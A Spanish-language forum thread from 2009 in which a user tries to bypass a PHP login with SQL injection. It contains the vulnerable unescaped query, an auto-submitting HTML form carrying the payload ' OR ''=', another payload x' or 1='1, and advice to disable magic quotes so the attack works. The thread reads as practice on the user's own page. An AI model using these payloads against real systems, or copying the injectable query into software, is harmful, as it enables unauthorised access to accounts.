|
Título: SQLi en login... Publicado por: Banti en 7 Diciembre 2009, 17:34 pm Tengo un problema yo otra vez....
Código: <? include("../Connections/conn_ig.php"); Tengo este codigo que autentifica al usuario que se conecta a la pagina... Que creo que es vulnerable a SQL Injection.echo $usuario = $HTTP_POST_VARS["usuario"]; echo $contrasena = $HTTP_POST_VARS["contrasena"]; $ssql = "SELECT * FROM usuarios WHERE nombre_usuario='$usuario' and clave_usuario='$contrasena'"; $rs = mysql_query($ssql,$cosa); $row=mysql_fetch_array($rs); if (mysql_num_rows($rs)!=0){ //usuario y contraseña válidos and tipo='admin' //defino una sesion y guardo datos session_start(); session_register("autentificado"); $_SESSION["autentificado"]= "SI"; //panel.php tiene el panel de control header("Location: panel.php"); } ?> Realizo este codigo: Código: <body onload="document.forms[0].submit()"> Pero no me funciona... Alguien me podria guiar?<form action="http://www.pagina.com.ar/conectar.php" method="post"> <input type="text" Name="usuario" Value="admin"> <input type="text" Name="contrasena" Value="' OR ''='"> </form> Título: Re: SQLi en login... Publicado por: Darioxhcx en 7 Diciembre 2009, 19:35 pm mira esto...
http://www.webtaller.com/construccion/lenguajes/php/lessons/evitar_inyeccion_sql.php capas te sirve..... Título: Re: SQLi en login... Publicado por: WHK en 7 Diciembre 2009, 19:35 pm Intenta ponerle valores válidos en ves de nada, por ejemplo de password:
x' or 1='1 tienes la base de datos puesta verdad? Verifica yambién que no tengas habilitado el magic quotes. Título: Re: SQLi en login... Publicado por: Banti en 8 Diciembre 2009, 00:18 am tienes la base de datos puesta verdad? Sip, una 100% real.Dario, lei un poco. Pero yo no veo ni una funcion malevola que me evite el SQLi. Aun no entiendo que coños es magic quotes pero era esa cosita que te cambiba los caracteres "malvados" a uno no muy malvado no? estuve viendo que cuando pongo el pass me lo recibe como: Código: x\' or 1=\'1 Es por culpa de las magic quotes?Título: Re: SQLi en login... Publicado por: WHK en 8 Diciembre 2009, 04:04 am Así es, es problemas del magic quotes.
Si quieres practicar debes deshabilitarlo desde el php.ini Título: Re: SQLi en login... Publicado por: Banti en 8 Diciembre 2009, 05:16 am Ah, ok Gracias otra vez!
|